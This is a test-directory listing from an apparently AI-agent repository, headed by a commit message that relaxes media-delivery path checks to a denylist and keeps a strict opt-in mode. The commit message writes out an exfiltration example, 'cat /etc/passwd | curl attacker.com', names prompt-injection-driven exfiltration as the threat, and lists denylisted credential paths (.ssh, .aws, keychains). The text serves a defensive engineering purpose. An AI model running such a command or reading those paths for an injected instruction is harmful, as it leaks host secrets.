hermes-agent/tests
Teknium 7a8589e782
fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022)
PR #29523 restricted MEDIA: paths and bare local paths in agent output to
files under the Hermes media cache or an operator-allowlisted root, with
a 10-minute recency window as a fallback. The intent was to defend
against prompt-injection-driven exfiltration of host secrets, but in the
default single-user setup the asymmetry doesn't earn its keep: we accept
any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...)
and the agent already has terminal access — anything that can convince
it to emit a MEDIA: tag for /etc/passwd can equally convince it to
`cat /etc/passwd | curl attacker.com`.

Practical breakage: agents that produced an .md, .pdf, or other
artifact more than ~10 minutes ago, or outside the cache allowlist,
showed the user a raw filepath in chat instead of the file.

Default flipped to denylist-only:
  • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run}
  • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud}
  • macOS Library/Keychains
  • $HERMES_HOME/{.env, auth.json, credentials}

The legacy allowlist+recency-window behavior stays available via
opt-in: `gateway.strict: true` in config.yaml (or
`HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots
where prompt injection from one user shouldn't be able to exfiltrate
the host's secrets to that same user.

• `gateway/platforms/base.py` — `validate_media_delivery_path()`
  short-circuits to "return resolved if not under denylist" when
  strict is off. Strict mode preserves the original cache-then-
  allowlist-then-recency logic. New `_media_delivery_strict_mode()`
  reader for `HERMES_MEDIA_DELIVERY_STRICT`.
• `hermes_cli/config.py` — `gateway.strict: false` added to
  DEFAULT_CONFIG; existing keys documented as "only consulted in
  strict mode." No `_config_version` bump needed (deep-merge picks
  up the new default for old installs).
• `gateway/run.py` — bridges `gateway.strict` →
  `HERMES_MEDIA_DELIVERY_STRICT` at startup.
• `tools/send_message_tool.py` — schema description broadened back
  to plain "any local path."
• Tests — existing strict-path tests pinned to STRICT=1 so they keep
  exercising the legacy behavior; new `TestMediaDeliveryDefaultMode`
  with 8 cases covering the public default (stale .md accepted, any
  extension delivers, credential paths still blocked, strict env-var
  aliases, filter E2E).

Validation:
  - tests/gateway/test_platform_base.py: 119/119 pass
  - tests/gateway/test_tts_media_routing.py: 7/7 pass
  - tests/tools/test_send_message_tool.py: 121/121 pass
  - tests/hermes_cli/test_kanban_notify.py: 12/12 pass
  - tests/cron/test_scheduler.py: 120/120 pass
  - E2E via execute_code with real imports:
    • stale .md outside allowlist → accepted (default)
    • same path with STRICT=1 → rejected
    • $HOME/.ssh/id_rsa → rejected (default)
    • filter_local_delivery_paths([md, key]) → [md] only
    • gateway.strict in config.yaml → bridged to env (true=1, false=0)
2026-05-28 11:32:36 -07:00
..
acp test(acp): drop flaky runtime_calls[-1] tail-position assertion 2026-05-24 23:23:12 -07:00
acp_adapter feat(azure-foundry): add Microsoft Entra ID auth 2026-05-18 10:14:38 -07:00
agent feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003) 2026-05-28 10:31:59 -07:00
cli test(auth): update entitlement CI expectations 2026-05-28 00:19:31 -07:00
cron test(ci): harden two flaky tests against CI noise (#33675) 2026-05-27 23:15:41 -07:00
docker fix(docker): bake build-time git SHA into the image 2026-05-28 15:14:05 +10:00
e2e refactor(gateway): migrate Discord adapter to bundled plugin (full Teams parity) 2026-05-22 14:21:41 -07:00
fakes
gateway fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022) 2026-05-28 11:32:36 -07:00
hermes_cli fix(xai-oauth): accept bare-code manual paste (state=None) (#26923) (#33880) 2026-05-28 05:47:30 -07:00
hermes_state feat(session_search): single-shape tool with discovery, scroll, browse — no LLM (#27590) 2026-05-17 23:28:45 -07:00
honcho_plugin fix(honcho): align peer-card read and write paths 2026-05-27 10:49:33 -07:00
integration chore(web): remove web_crawl tool + provider crawl plumbing (#33824) 2026-05-28 04:52:42 -07:00
openviking_plugin
plugins chore(web): remove web_crawl tool + provider crawl plumbing (#33824) 2026-05-28 04:52:42 -07:00
providers feat(openrouter): pass session_id in extra_body for sticky routing 2026-05-28 08:52:19 -07:00
run_agent fix(agent): fallback immediately on provider content-policy blocks (#33883) 2026-05-28 07:28:24 -07:00
scripts
skills fix(skills): add timeout to Google OAuth urlopen calls 2026-05-19 00:11:44 -07:00
stress docs: align kanban readiness docs and smoke tests 2026-05-18 21:07:03 -07:00
tools fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022) 2026-05-28 11:32:36 -07:00
tui_gateway chore: ruff auto-fix PLR6201 resweep — tuple → set in membership tests (#27355) 2026-05-17 02:29:41 -07:00
website
__init__.py
conftest.py test(dashboard-auth): strip HERMES_DASHBOARD_OAUTH_* env vars in hermetic fixture 2026-05-27 02:12:27 -07:00
run_interrupt_test.py
test_account_usage.py
test_atomic_replace_symlinks.py
test_base_url_hostname.py
test_batch_runner_checkpoint.py
test_bitwarden_secrets.py perf(cli): cut hermes startup 63% — flip head-to-head vs codex (#31968) 2026-05-25 03:06:39 -07:00
test_cli_file_drop.py
test_cli_manual_compress.py fix(tests): catch up six stale tests after compression/aux/kanban changes (#28465) 2026-05-18 21:43:59 -07:00
test_cli_skin_integration.py
test_ctx_halving_fix.py
test_docker_home_override_scripts.py fix(docker): align HOME for dashboard and s6 gateway services (#33481) 2026-05-28 13:42:27 +10:00
test_empty_model_fallback.py
test_env_loader_secret_sources.py fix(secrets): only apply external secrets once per HERMES_HOME per process (#32271) 2026-05-25 15:18:55 -07:00
test_evidence_store.py
test_gateway_streaming_nested_config.py
test_get_tool_definitions_cache_isolation.py
test_hermes_bootstrap.py
test_hermes_constants.py fix(security): guard os.chmod(parent) against / and top-level dirs 2026-05-20 22:56:55 -07:00
test_hermes_home_profile_warning.py
test_hermes_logging.py fix(tests): catch up 25 stale tests after recent merges (#28626) 2026-05-19 01:28:32 -07:00
test_hermes_state.py fix(kanban): skip redundant WAL pragma on already-WAL connections 2026-05-27 14:31:55 -07:00
test_hermes_state_wal_fallback.py fix(kanban): skip redundant WAL pragma on already-WAL connections 2026-05-27 14:31:55 -07:00
test_honcho_client_config.py
test_honcho_session_context.py fix(honcho): align user context peer perspective 2026-05-27 10:49:33 -07:00
test_install_sh_browser_install.py
test_install_sh_pythonpath_sanitization.py
test_install_sh_root_fhs_uv_python_path.py test(install): harden uv-python-path regression test against future drift 2026-05-27 13:55:51 -07:00
test_install_sh_setup_wizard_tty_probe.py
test_install_sh_symlink_stomp.py
test_install_sh_termux_network_prereqs.py
test_ipv4_preference.py
test_lazy_session_regressions.py
test_lint_config.py
test_live_system_guard_self_test.py chore: ruff auto-fix PLR6201 resweep — tuple → set in membership tests (#27355) 2026-05-17 02:29:41 -07:00
test_mcp_serve.py
test_mini_swe_runner.py
test_minimax_model_validation.py
test_minimax_oauth.py fix(minimax-oauth): refresh short-lived access tokens per request (#30619) 2026-05-22 15:16:15 -07:00
test_minisweagent_path.py
test_model_picker_scroll.py
test_model_tools.py
test_model_tools_async_bridge.py
test_ollama_num_ctx.py
test_package_json_lazy_deps.py
test_packaging_metadata.py
test_plugin_skills.py
test_process_loop_event_loop_warning.py
test_project_metadata.py remove Vercel AI Gateway and Vercel Sandbox (#33067) 2026-05-27 00:43:32 -07:00
test_retry_utils.py
test_run_tests_parallel.py test: use subprocesses for each test file (#29016) 2026-05-21 16:40:04 +05:30
test_sanitize_tool_error.py
test_sql_injection.py
test_subprocess_home_isolation.py fix: avoid process-wide cron profile home mutation 2026-05-18 17:39:50 +00:00
test_termux_all_extra_compat.py
test_timezone.py chore: ruff auto-fix PLR6201 resweep — tuple → set in membership tests (#27355) 2026-05-17 02:29:41 -07:00
test_toolset_distributions.py
test_toolsets.py
test_trajectory_compressor.py
test_trajectory_compressor_async.py
test_transform_llm_output_hook.py
test_transform_tool_result_hook.py
test_tui_gateway_server.py feat: add TUI session orchestrator 2026-05-26 20:51:59 -07:00
test_utils_truthy_values.py
test_yuanbao_integration.py
test_yuanbao_markdown.py
test_yuanbao_pipeline.py
test_yuanbao_proto.py